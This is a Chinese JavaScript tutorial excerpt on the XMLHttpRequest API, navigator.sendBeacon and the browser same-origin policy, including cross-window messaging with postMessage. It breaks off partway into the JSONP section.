
58.2.5 XMLHttpRequest.responseText

XMLHttpRequest.responseText属性返回从服务器接收到的字符串,该属性为只读。只有 HTTP 请求完成接收以后,该属性才会包含完整的数据。

var xhr = new XMLHttpRequest();
xhr.open('GET', '/server', true);

xhr.responseType = 'text';
xhr.onload = function () {
     
  if (xhr.readyState === 4 && xhr.status === 200) {
     
    console.log(xhr.responseText);
  }
};

xhr.send(null);

58.2.6 XMLHttpRequest.responseXML

XMLHttpRequest.responseXML属性返回从服务器接收到的 HTML 或 XML 文档对象,该属性为只读。如果本次请求没有成功,或者收到的数据不能被解析为 XML 或 HTML,该属性等于null

该属性生效的前提是 HTTP 回应的Content-Type头信息等于text/xmlapplication/xml。这要求在发送请求前,XMLHttpRequest.responseType属性要设为document。如果 HTTP 回应的Content-Type头信息不等于text/xmlapplication/xml,但是想从responseXML拿到数据(即把数据按照 DOM 格式解析),那么需要手动调用XMLHttpRequest.overrideMimeType()方法,强制进行 XML 解析。

该属性得到的数据,是直接解析后的文档 DOM 树。

var xhr = new XMLHttpRequest();
xhr.open('GET', '/server', true);

xhr.responseType = 'document';
xhr.overrideMimeType('text/xml');

xhr.onload = function () {
     
  if (xhr.readyState === 4 && xhr.status === 200) {
     
    console.log(xhr.responseXML);
  }
};

xhr.send(null);

58.2.7 XMLHttpRequest.responseURL

XMLHttpRequest.responseURL属性是字符串,表示发送数据的服务器的网址。

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://example.com/test', true);
xhr.onload = function () {
     
  // 返回 http://example.com/test
  console.log(xhr.responseURL);
};
xhr.send(null);

注意,这个属性的值与open()方法指定的请求网址不一定相同。如果服务器端发生跳转,这个属性返回最后实际返回数据的网址。另外,如果原始 URL 包括锚点(fragment),该属性会把锚点剥离。

58.2.8 XMLHttpRequest.status,XMLHttpRequest.statusText

XMLHttpRequest.status属性返回一个整数,表示服务器回应的 HTTP 状态码。一般来说,如果通信成功的话,这个状态码是200;如果服务器没有返回状态码,那么这个属性默认是200。请求发出之前,该属性为0。该属性只读。

  • 200, OK,访问正常
  • 301, Moved Permanently,永久移动
  • 302, Moved temporarily,暂时移动
  • 304, Not Modified,未修改
  • 307, Temporary Redirect,暂时重定向
  • 401, Unauthorized,未授权
  • 403, Forbidden,禁止访问
  • 404, Not Found,未发现指定网址
  • 500, Internal Server Error,服务器发生错误

基本上,只有2xx和304的状态码,表示服务器返回是正常状态

if (xhr.readyState === 4) {
     
  if ( (xhr.status >= 200 && xhr.status < 300)
    || (xhr.status === 304) ) {
     
    // 处理服务器的返回数据
  } else {
     
    // 出错
  }
}

XMLHttpRequest.statusText属性返回一个字符串,表示服务器发送的状态提示。不同于status属性,该属性包含整个状态信息,比如“OK”和“Not Found”。在请求发送之前(即调用open()方法之前),该属性的值是空字符串;如果服务器没有返回状态提示,该属性的值默认为“OK”。该属性为只读属性。

58.2.9 XMLHttpRequest.timeout,XMLHttpRequestEventTarget.ontimeout

XMLHttpRequest.timeout属性返回一个整数,表示多少毫秒后,如果请求仍然没有得到结果,就会自动终止。如果该属性等于0,就表示没有时间限制。

XMLHttpRequestEventTarget.ontimeout属性用于设置一个监听函数,如果发生 timeout 事件,就会执行这个监听函数。

下面是一个例子。

var xhr = new XMLHttpRequest();
var url = '/server';

xhr.ontimeout = function () {
     
  console.error('The request for ' + url + ' timed out.');
};

xhr.onload = function() {
     
  if (xhr.readyState === 4) {
     
    if (xhr.status === 200) {
     
      // 处理服务器返回的数据
    } else {
     
      console.error(xhr.statusText);
    }
  }
};

xhr.open('GET', url, true);
// 指定 10 秒钟超时
xhr.timeout = 10 * 1000;
xhr.send(null);

58.2.10 事件监听属性(on-**)

XMLHttpRequest 对象可以对以下事件指定监听函数。

  • XMLHttpRequest.onloadstart:loadstart 事件(HTTP 请求发出)的监听函数
  • XMLHttpRequest.onprogress:progress事件(正在发送和加载数据)的监听函数
  • XMLHttpRequest.onabort:abort 事件(请求中止,比如用户调用了abort()方法)的监听函数
  • XMLHttpRequest.onerror:error 事件(请求失败)的监听函数
  • XMLHttpRequest.onload:load 事件(请求成功完成)的监听函数
  • XMLHttpRequest.ontimeout:timeout 事件(用户指定的时限超过了,请求还未完成)的监听函数
  • XMLHttpRequest.onloadend:loadend 事件(请求完成,不管成功或失败)的监听函数

下面是一个例子。

xhr.onload = function() {
     
 var responseText = xhr.responseText;
 console.log(responseText);
 // process the response.
};

xhr.onabort = function () {
     
  console.log('The request was aborted');
};

xhr.onprogress = function (event) {
     
  console.log(event.loaded);
  console.log(event.total);
};

xhr.onerror = function() {
     
  console.log('There was an error!');
};

progress事件的监听函数有一个事件对象参数,该对象有三个属性:loaded属性返回已经传输的数据量,total属性返回总的数据量,lengthComputable属性返回一个布尔值,表示加载的进度是否可以计算。所有这些监听函数里面,只有progress事件的监听函数有参数,其他函数都没有参数。

注意,如果发生网络错误(比如服务器无法连通),onerror事件无法获取报错信息。也就是说,可能没有错误对象,所以这样只能显示报错的提示。

58.2.11 XMLHttpRequest.withCredentials

XMLHttpRequest.withCredentials属性是一个布尔值,表示跨域请求时,用户信息(比如 Cookie 和认证的 HTTP 头信息)是否会包含在请求之中,默认为false,即向example.com发出跨域请求时,不会发送example.com设置在本机上的 Cookie(如果有的话)。

如果需要跨域 AJAX 请求发送 Cookie,需要withCredentials属性设为true。注意,同源的请求不需要设置这个属性。

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://example.com/', true);
xhr.withCredentials = true;
xhr.send(null);

为了让这个属性生效,服务器必须显式返回Access-Control-Allow-Credentials这个头信息。

Access-Control-Allow-Credentials: true

withCredentials属性打开的话,跨域请求不仅会发送 Cookie,还会设置远程主机指定的 Cookie。反之也成立,如果withCredentials属性没有打开,那么跨域的 AJAX 请求即使明确要求浏览器设置 Cookie,浏览器也会忽略。

注意,脚本总是遵守同源政策,无法从document.cookie或者 HTTP 回应的头信息之中,读取跨域的 Cookie,withCredentials属性不影响这一点。

58.2.12 XMLHttpRequest.upload

XMLHttpRequest 不仅可以发送请求,还可以发送文件,这就是 AJAX 文件上传。发送文件以后,通过XMLHttpRequest.upload属性可以得到一个对象,通过观察这个对象,可以得知上传的进展。主要方法就是监听这个对象的各种事件:loadstart、loadend、load、abort、error、progress、timeout。

假定网页上有一个元素。

<progress min="0" max="100" value="0">0% complete</progress>

文件上传时,对upload属性指定progress事件的监听函数,即可获得上传的进度。

function upload(blobOrFile) {
     
  var xhr = new XMLHttpRequest();
  xhr.open('POST', '/server', true);
  xhr.onload = function (e) {
     };

  var progressBar = document.querySelector('progress');
  xhr.upload.onprogress = function (e) {
     
    if (e.lengthComputable) {
     
      progressBar.value = (e.loaded / e.total) * 100;
      // 兼容不支持  元素的老式浏览器
      progressBar.textContent = progressBar.value;
    }
  };

  xhr.send(blobOrFile);
}

upload(new Blob(['hello world'], {
     type: 'text/plain'}));

58.3 XMLHttpRequest 的实例方法

58.3.1 XMLHttpRequest.open()

XMLHttpRequest.open()方法用于指定 HTTP 请求的参数,或者说初始化 XMLHttpRequest 实例对象。它一共可以接受五个参数。

void open(
   string method,
   string url,
   optional boolean async,
   optional string user,
   optional string password
);
  • method:表示 HTTP 动词方法,比如GETPOSTPUTDELETEHEAD等。
  • url: 表示请求发送目标 URL。
  • async: 布尔值,表示请求是否为异步,默认为true。如果设为false,则send()方法只有等到收到服务器返回了结果,才会进行下一步操作。该参数可选。由于同步 AJAX 请求会造成浏览器失去响应,许多浏览器已经禁止在主线程使用,只允许 Worker 里面使用。所以,这个参数轻易不应该设为false
  • user:表示用于认证的用户名,默认为空字符串。该参数可选。
  • password:表示用于认证的密码,默认为空字符串。该参数可选。

注意,如果对使用过open()方法的 AJAX 请求,再次使用这个方法,等同于调用abort(),即终止请求。

下面发送 POST 请求的例子。

var xhr = new XMLHttpRequest();
xhr.open('POST', encodeURI('someURL'));

58.3.2 XMLHttpRequest.send()

XMLHttpRequest.send()方法用于实际发出 HTTP 请求。它的参数是可选的,如果不带参数,就表示 HTTP 请求只有一个 URL,没有数据体,典型例子就是 GET 请求;如果带有参数,就表示除了头信息,还带有包含具体数据的信息体,典型例子就是 POST 请求。

下面是 GET 请求的例子。

var xhr = new XMLHttpRequest();
xhr.open('GET',
  'http://www.example.com/?id=' + encodeURIComponent(id),
  true
);
xhr.send(null);

上面代码中,GET请求的参数,作为查询字符串附加在 URL 后面。

下面是发送 POST 请求的例子。

var xhr = new XMLHttpRequest();
var data = 'email='
  + encodeURIComponent(email)
  + '&password='
  + encodeURIComponent(password);

xhr.open('POST', 'http://www.example.com', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send(data);

注意,所有 XMLHttpRequest 的监听事件,都必须在send()方法调用之前设定。

send方法的参数就是发送的数据。多种格式的数据,都可以作为它的参数。

void send();
void send(ArrayBufferView data);
void send(Blob data);
void send(Document data);
void send(String data);
void send(FormData data);

如果send()发送 DOM 对象,在发送之前,数据会先被串行化。如果发送二进制数据,最好是发送ArrayBufferViewBlob对象,这使得通过 Ajax 上传文件成为可能。

下面是发送表单数据的例子。FormData对象可以用于构造表单数据。

var formData = new FormData();

formData.append('username', '张三');
formData.append('email', '[email protected]');
formData.append('birthDate', 1940);

var xhr = new XMLHttpRequest();
xhr.open('POST', '/register');
xhr.send(formData);

上面代码中,FormData对象构造了表单数据,然后使用send()方法发送。它的效果与发送下面的表单数据是一样的。

<form id='registration' name='registration' action='/register'>
  <input type='text' name='username' value='张三'>
  <input type='email' name='email' value='[email protected]'>
  <input type='number' name='birthDate' value='1940'>
  <input type='submit' onclick='return sendForm(this.form);'>
</form>

下面的例子是使用FormData对象加工表单数据,然后再发送。

function sendForm(form) {
     
  var formData = new FormData(form);
  formData.append('csrf', 'e69a18d7db1286040586e6da1950128c');

  var xhr = new XMLHttpRequest();
  xhr.open('POST', form.action, true);
  xhr.onload = function() {
     
    // ...
  };
  xhr.send(formData);

  return false;
}

var form = document.querySelector('#registration');
sendForm(form);

58.3.3 XMLHttpRequest.setRequestHeader()

XMLHttpRequest.setRequestHeader()方法用于设置浏览器发送的 HTTP 请求的头信息。该方法必须在open()之后、send()之前调用。如果该方法多次调用,设定同一个字段,则每一次调用的值会被合并成一个单一的值发送。

该方法接受两个参数。第一个参数是字符串,表示头信息的字段名,第二个参数是字段值。

xhr.setRequestHeader('Content-Type', 'application/json');
xhr.setRequestHeader('Content-Length', JSON.stringify(data).length);
xhr.send(JSON.stringify(data));

上面代码首先设置头信息Content-Type,表示发送 JSON 格式的数据;然后设置Content-Length,表示数据长度;最后发送 JSON 数据。

58.3.4 XMLHttpRequest.overrideMimeType()

XMLHttpRequest.overrideMimeType()方法用来指定 MIME 类型,覆盖服务器返回的真正的 MIME 类型,从而让浏览器进行不一样的处理。举例来说,服务器返回的数据类型是text/xml,由于种种原因浏览器解析不成功报错,这时就拿不到数据了。为了拿到原始数据,我们可以把 MIME 类型改成text/plain,这样浏览器就不会去自动解析,从而我们就可以拿到原始文本了。

xhr.overrideMimeType('text/plain')

注意,该方法必须在send()方法之前调用。

修改服务器返回的数据类型,不是正常情况下应该采取的方法。如果希望服务器返回指定的数据类型,可以用responseType属性告诉服务器,就像下面的例子。只有在服务器无法返回某种数据类型时,才使用overrideMimeType()方法。

var xhr = new XMLHttpRequest();
xhr.onload = function(e) {
     
  var arraybuffer = xhr.response;
  // ...
}
xhr.open('GET', url);
xhr.responseType = 'arraybuffer';
xhr.send();

58.3.5 XMLHttpRequest.getResponseHeader()

XMLHttpRequest.getResponseHeader()方法返回 HTTP 头信息指定字段的值,如果还没有收到服务器回应或者指定字段不存在,返回null。该方法的参数不区分大小写。

function getHeaderTime() {
     
  console.log(this.getResponseHeader("Last-Modified"));
}

var xhr = new XMLHttpRequest();
xhr.open('HEAD', 'yourpage.html');
xhr.onload = getHeaderTime;
xhr.send();

如果有多个字段同名,它们的值会被连接为一个字符串,每个字段之间使用“逗号+空格”分隔。

58.3.6 XMLHttpRequest.getAllResponseHeaders()

XMLHttpRequest.getAllResponseHeaders()方法返回一个字符串,表示服务器发来的所有 HTTP 头信息。格式为字符串,每个头信息之间使用CRLF分隔(回车+换行),如果没有收到服务器回应,该属性为null。如果发生网络错误,该属性为空字符串。

var xhr = new XMLHttpRequest();
xhr.open('GET', 'foo.txt', true);
xhr.send();

xhr.onreadystatechange = function () {
     
  if (this.readyState === 4) {
     
    var headers = xhr.getAllResponseHeaders();
  }
}

上面代码用于获取服务器返回的所有头信息。它可能是下面这样的字符串。

date: Fri, 08 Dec 2017 21:04:30 GMT\r\n
content-encoding: gzip\r\n
x-content-type-options: nosniff\r\n
server: meinheld/0.6.1\r\n
x-frame-options: DENY\r\n
content-type: text/html; charset=utf-8\r\n
connection: keep-alive\r\n
strict-transport-security: max-age=63072000\r\n
vary: Cookie, Accept-Encoding\r\n
content-length: 6502\r\n
x-xss-protection: 1; mode=block\r\n

然后,对这个字符串进行处理。

var arr = headers.trim().split(/[\r\n]+/);
var headerMap = {
     };

arr.forEach(function (line) {
     
  var parts = line.split(': ');
  var header = parts.shift();
  var value = parts.join(': ');
  headerMap[header] = value;
});

headerMap['content-length'] // "6502"

58.3.7 XMLHttpRequest.abort()

XMLHttpRequest.abort()方法用来终止已经发出的 HTTP 请求。调用这个方法以后,readyState属性变为4status属性变为0

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://www.example.com/page.php', true);
setTimeout(function () {
     
  if (xhr) {
     
    xhr.abort();
    xhr = null;
  }
}, 5000);

上面代码在发出5秒之后,终止一个 AJAX 请求。

58.4 XMLHttpRequest 实例的事件

58.4.1 readyStateChange 事件

readyState属性的值发生改变,就会触发 readyStateChange 事件。

我们可以通过onReadyStateChange属性,指定这个事件的监听函数,对不同状态进行不同处理。尤其是当状态变为4的时候,表示通信成功,这时回调函数就可以处理服务器传送回来的数据。

58.4.2 progress 事件

上传文件时,XMLHttpRequest 实例对象本身和实例的upload属性,都有一个progress事件,会不断返回上传的进度。

var xhr = new XMLHttpRequest();

function updateProgress (oEvent) {
     
  if (oEvent.lengthComputable) {
     
    var percentComplete = oEvent.loaded / oEvent.total;
  } else {
     
    console.log('无法计算进展');
  }
}

xhr.addEventListener('progress', updateProgress);

xhr.open();

58.4.3 load 事件、error 事件、abort 事件

load 事件表示服务器传来的数据接收完毕,error 事件表示请求出错,abort 事件表示请求被中断(比如用户取消请求)。

var xhr = new XMLHttpRequest();

xhr.addEventListener('load', transferComplete);
xhr.addEventListener('error', transferFailed);
xhr.addEventListener('abort', transferCanceled);

xhr.open();

function transferComplete() {
     
  console.log('数据接收完毕');
}

function transferFailed() {
     
  console.log('数据接收出错');
}

function transferCanceled() {
     
  console.log('用户取消接收');
}

58.4.4 loadend 事件

abortloaderror这三个事件,会伴随一个loadend事件,表示请求结束,但不知道其是否成功。

xhr.addEventListener('loadend', loadEnd);

function loadEnd(e) {
     
  console.log('请求结束,状态未知');
}

58.4.5 timeout 事件

服务器超过指定时间还没有返回结果,就会触发 timeout 事件,具体的例子参见timeout属性一节。

58.5 Navigator.sendBeacon()

**用户卸载网页的时候,有时需要向服务器发一些数据。**很自然的做法是在unload事件或beforeunload事件的监听函数里面,使用XMLHttpRequest对象发送数据。但是,这样做不是很可靠,因为XMLHttpRequest对象是异步发送,很可能在它即将发送的时候,页面已经卸载了,从而导致发送取消或者发送失败

解决方法就是unload事件里面,加一些很耗时的同步操作。这样就能留出足够的时间,保证异步 AJAX 能够发送成功。

function log() {
     
  let xhr = new XMLHttpRequest();
  xhr.open('post', '/log', true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send('foo=bar');
}

window.addEventListener('unload', function(event) {
     
  log();

  // a time-consuming operation
  for (let i = 1; i < 10000; i++) {
     
    for (let m = 1; m < 10000; m++) {
      continue; }
  }
});

上面代码中,强制执行了一次双重循环,拖长了unload事件的执行时间,导致异步 AJAX 能够发送成功。

类似的还可以使用setTimeout。下面是追踪用户点击的例子。

// HTML 代码如下
// click
const clickTime = 350;
const theLink = document.getElementById('target');

function log() {
     
  let xhr = new XMLHttpRequest();
  xhr.open('post', '/log', true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send('foo=bar');
}

theLink.addEventListener('click', function (event) {
     
  event.preventDefault();
  log();

  setTimeout(function () {
     
    window.location.href = theLink.getAttribute('href');
  }, clickTime);
});

上面代码使用setTimeout,拖延了350毫秒,才让页面跳转,因此使得异步 AJAX 有时间发出。

这些做法的共同问题是,卸载的时间被硬生生拖长了,后面页面的加载被推迟了,用户体验不好。

为了解决这个问题,浏览器引入了Navigator.sendBeacon()方法。这个方法还是异步发出请求,但是请求与当前页面线程脱钩,作为浏览器进程的任务,因此可以保证会把数据发出去,不拖延卸载流程。

window.addEventListener('unload', logData, false);

function logData() {
     
  navigator.sendBeacon('/log', analyticsData);
}

Navigator.sendBeacon方法接受两个参数,第一个参数是目标服务器的 URL,第二个参数是所要发送的数据(可选),可以是任意类型(字符串、表单对象、二进制对象等等)。

navigator.sendBeacon(url, data)

这个方法的返回值是一个布尔值,成功发送数据为true,否则为false

该方法发送数据的 HTTP 方法是 POST,可以跨域,类似于表单提交数据。它不能指定回调函数。

下面是一个例子。

// HTML 代码如下
// 

function analytics(state) {
     
  if (!navigator.sendBeacon) return;

  var URL = 'http://example.com/analytics';
  var data = 'state=' + state + '&location=' + window.location;
  navigator.sendBeacon(URL, data);
}

59. 同源限制

浏览器安全的基石是“同源政策”(same-origin policy)。很多开发者都知道这一点,但了解得不全面。

59.1 概述

59.1.1 含义

1995年,同源政策由 Netscape 公司引入浏览器。目前,所有浏览器都实行这个政策。

最初,它的含义是指,A 网页设置的 Cookie,B 网页不能打开,除非这两个网页“同源”。所谓“同源”指的是“三个相同”。

  • 协议相同
  • 域名相同
  • 端口相同(这点可以忽略,详见下文)

举例来说,http://www.example.com/dir/page.html这个网址,协议是http://,域名是www.example.com,端口是80(默认端口可以省略),它的同源情况如下。

  • http://www.example.com/dir2/other.html:同源
  • http://example.com/dir/other.html:不同源(域名不同)
  • http://v2.www.example.com/dir/other.html:不同源(域名不同)
  • http://www.example.com:81/dir/other.html:不同源(端口不同)
  • https://www.example.com/dir/page.html:不同源(协议不同)

注意,标准规定端口不同的网址不是同源(比如8000端口和8001端口不是同源),但是浏览器没有遵守这条规定。实际上,同一个网域的不同端口,是可以互相读取 Cookie 的。

59.1.2 目的

同源政策的目的,是为了保证用户信息的安全,防止恶意的网站窃取数据。

设想这样一种情况:A 网站是一家银行,用户登录以后,A 网站在用户的机器上设置了一个 Cookie,包含了一些隐私信息。用户离开 A 网站以后,又去访问 B 网站,如果没有同源限制,B 网站可以读取 A 网站的 Cookie,那么隐私就泄漏了。更可怕的是,Cookie 往往用来保存用户的登录状态,如果用户没有退出登录,其他网站就可以冒充用户,为所欲为。因为浏览器同时还规定,提交表单不受同源政策的限制。

由此可见,同源政策是必需的,否则 Cookie 可以共享,互联网就毫无安全可言了。

59.1.3 限制范围

随着互联网的发展,同源政策越来越严格。目前,如果非同源,共有三种行为受到限制。

(1) 无法读取非同源网页的 Cookie、LocalStorage 和 IndexedDB。

(2) 无法接触非同源网页的 DOM。

(3) 无法向非同源地址发送 AJAX 请求(可以发送,但浏览器会拒绝接受响应)。

另外,通过 JavaScript 脚本可以拿到其他窗口的window对象。如果是非同源的网页,目前允许一个窗口可以接触其他网页的window对象的九个属性和四个方法。

  • window.closed
  • window.frames
  • window.length
  • window.location
  • window.opener
  • window.parent
  • window.self
  • window.top
  • window.window
  • window.blur()
  • window.close()
  • window.focus()
  • window.postMessage()

上面的九个属性之中,只有window.location是可读写的,其他八个全部都是只读。而且,即使是location对象,非同源的情况下,也只允许调用location.replace()方法和写入location.href属性。

虽然这些限制是必要的,但是有时很不方便,合理的用途也受到影响。下面介绍如何规避上面的限制。

59.2 Cookie

Cookie 是服务器写入浏览器的一小段信息,只有同源的网页才能共享。如果两个网页一级域名相同,只是次级域名不同,浏览器允许通过设置document.domain共享 Cookie。

举例来说,A 网页的网址是http://w1.example.com/a.html,B 网页的网址是http://w2.example.com/b.html,那么只要设置相同的document.domain,两个网页就可以共享 Cookie。因为浏览器通过document.domain属性来检查是否同源。

// 两个网页都需要设置
document.domain = 'example.com';

注意,A 和 B 两个网页都需要设置document.domain属性,才能达到同源的目的。因为设置document.domain的同时,会把端口重置为null,因此如果只设置一个网页的document.domain,会导致两个网址的端口不同,还是达不到同源的目的。

现在,A 网页通过脚本设置一个 Cookie。

document.cookie = "test1=hello";

B 网页就可以读到这个 Cookie。

var allCookie = document.cookie;

注意,这种方法只适用于 Cookie 和 iframe 窗口,LocalStorage 和 IndexedDB 无法通过这种方法,规避同源政策,而要使用下文介绍 PostMessage API。

另外,服务器也可以在设置 Cookie 的时候,指定 Cookie 的所属域名为一级域名,比如.example.com

Set-Cookie: key=value; domain=.example.com; path=/

这样的话,二级域名和三级域名不用做任何设置,都可以读取这个 Cookie。

59.3 iframe 和多窗口通信

iframe元素可以在当前网页之中,嵌入其他网页。每个iframe元素形成自己的窗口,即有自己的window对象。iframe窗口之中的脚本,可以获得父窗口和子窗口。但是,只有在同源的情况下,父窗口和子窗口才能通信;如果跨域,就无法拿到对方的 DOM

比如,父窗口运行下面的命令,如果iframe窗口不是同源,就会报错。

document
.getElementById("myIFrame")
.contentWindow
.document
// Uncaught DOMException: Blocked a frame from accessing a cross-origin frame.

上面命令中,父窗口想获取子窗口的 DOM,因为跨域导致报错。

反之亦然,子窗口获取主窗口的 DOM 也会报错。

window.parent.document.body
// 报错

这种情况不仅适用于iframe窗口,还适用于window.open方法打开的窗口,只要跨域,父窗口与子窗口之间就无法通信。

如果两个窗口一级域名相同,只是二级域名不同,那么设置上一节介绍的document.domain属性,就可以规避同源政策,拿到 DOM。

对于完全不同源的网站,目前有两种方法,可以解决跨域窗口的通信问题。

  • 片段识别符(fragment identifier)
  • 跨文档通信API(Cross-document messaging)

59.3.1 片段识别符 fragment identifier

片段标识符(fragment identifier)指的是,URL 的#号后面的部分,比如http://example.com/x.html#fragment#fragment。如果只是改变片段标识符,页面不会重新刷新。

父窗口可以把信息,写入子窗口的片段标识符。

var src = originURL + '#' + data;
document.getElementById('myIFrame').src = src;

上面代码中,父窗口把所要传递的信息,写入 iframe 窗口的片段标识符。

子窗口通过监听hashchange事件得到通知。

window.onhashchange = checkMessage;

function checkMessage() {
     
  var message = window.location.hash;
  // ...
}

同样的,子窗口也可以改变父窗口的片段标识符。

parent.location.href = target + '#' + hash;

59.3.2 window.postMessage()(message-.source .origin

上面的这种方法属于破解,HTML5 为了解决这个问题,引入了一个全新的API:跨文档通信 API(Cross-document messaging)。

这个 API 为window对象新增了一个window.postMessage方法,允许跨窗口通信,不论这两个窗口是否同源。举例来说,父窗口aaa.com向子窗口bbb.com发消息,调用postMessage方法就可以了。

// 父窗口打开一个子窗口
var popup = window.open('http://bbb.com', 'title');
// 父窗口向子窗口发消息
popup.postMessage('Hello World!', 'http://bbb.com');

postMessage方法的第一个参数是具体的信息内容,第二个参数是接收消息的窗口的源(origin),即“协议 + 域名 + 端口”。也可以设为*,表示不限制域名,向所有窗口发送。

子窗口向父窗口发送消息的写法类似。

// 子窗口向父窗口发消息
window.opener.postMessage('Nice to see you', 'http://aaa.com');

父窗口和子窗口都可以通过message事件,监听对方的消息。

// 父窗口和子窗口都可以用下面的代码,
// 监听 message 消息
window.addEventListener('message', function (e) {
     
  console.log(e.data);
},false);

message事件的参数是事件对象event,提供以下三个属性。

  • event.source:发送消息的窗口
  • event.origin: 消息发向的网址(接收信息的网址)
  • event.data: 消息内容

下面的例子是,子窗口通过event.source属性引用父窗口,然后发送消息。

window.addEventListener('message', receiveMessage);
function receiveMessage(event) {
     
  event.source.postMessage('Nice to see you!', '*');
}

上面代码有几个地方需要注意。首先,receiveMessage函数里面没有过滤信息的来源,任意网址发来的信息都会被处理。其次,postMessage方法中指定的目标窗口的网址是一个星号,表示该信息可以向任意网址发送。通常来说,这两种做法是不推荐的,因为不够安全,可能会被恶意利用。

event.origin属性可以过滤不是发给本窗口的消息。(过滤后更安全)

window.addEventListener('message', receiveMessage);
function receiveMessage(event) {
     
  if (event.origin !== 'http://aaa.com') return;
  if (event.data === 'Hello World') {
     
    event.source.postMessage('Hello', event.origin);
  } else {
     
    console.log(event.data);
  }
}

59.3.3 LocalStorage

localStorage 和 sessionStorage 属性允许在浏览器中存储 key/value 对的数据。localStorage 用于长久保存整个网站的数据,保存的数据没有过期时间,直到手动去删除。sessionStorage 用于临时保存同一窗口(或标签页)的数据,在关闭窗口或标签页之后将会删除这些数据。

通过window.postMessage,读写其他窗口的 LocalStorage 也成为了可能。

下面是一个例子,主窗口写入 iframe 子窗口的localStorage

window.onmessage = function(e) {
     
  if (e.origin !== 'http://bbb.com') {
     
    return;
  }
  var payload = JSON.parse(e.data);
  localStorage.setItem(payload.key, JSON.stringify(payload.data));
};

上面代码中,子窗口将父窗口发来的消息,写入自己的 LocalStorage。

父窗口发送消息的代码如下。

var win = document.getElementsByTagName('iframe')[0].contentWindow;
var obj = {
      name: 'Jack' };
win.postMessage(
  JSON.stringify({
     key: 'storage', data: obj}),
  'http://bbb.com'
);

加强版的子窗口接收消息的代码如下。

window.onmessage = function(e) {
     
  if (e.origin !== 'http://bbb.com') return;
  var payload = JSON.parse(e.data);
  switch (payload.method) {
     
    case 'set':
      localStorage.setItem(payload.key, JSON.stringify(payload.data));
      break;
    case 'get':
      var parent = window.parent;
      var data = localStorage.getItem(payload.key);
      parent.postMessage(data, 'http://aaa.com');
      break;
    case 'remove':
      localStorage.removeItem(payload.key);
      break;
  }
};

加强版的父窗口发送消息代码如下。

var win = document.getElementsByTagName('iframe')[0].contentWindow;
var obj = {
      name: 'Jack' };
// 存入对象
win.postMessage(
  JSON.stringify({
     key: 'storage', method: 'set', data: obj}),
  'http://bbb.com'
);
// 读取对象
win.postMessage(
  JSON.stringify({
     key: 'storage', method: "get"}),
  "*"
);
window.onmessage = function(e) {
     
  if (e.origin != 'http://aaa.com') return;
  console.log(JSON.parse(e.data).name);
};

59.4 AJAX

同源政策规定,AJAX 请求只能发给同源的网址,否则就报错。

除了架设服务器代理(浏览器请求同源服务器,再由后者请求外部服务),有三种方法规避这个限制。

  • JSONP
  • WebSocket
  • CORS

59.4.1 JSONP

JSONP 是服务器与客户端跨源通信的常用方法。最大特点就是简单易用,没有兼容性问题,老式浏览器全部支持,服务端改造非常小。

它的做法如下。

第一步,网页添加一个

注意,请求的脚本网址有一个callback参数(?callback=bar),用来告诉服务器,客户端的回调函数名称(bar)。

第二步,服务器收到请求后,拼接一个字符串,将 JSON 数据放在函数名里面,作为字符串返回(bar({...}))。

第三步,客户端会将服务器返回的字符串,作为代码解析,因为浏览器认为,这是

你可能感兴趣的:(前端工程师1——汇总,navigator,cookie,xmlhttprequest,ajax,ajax跨域问题)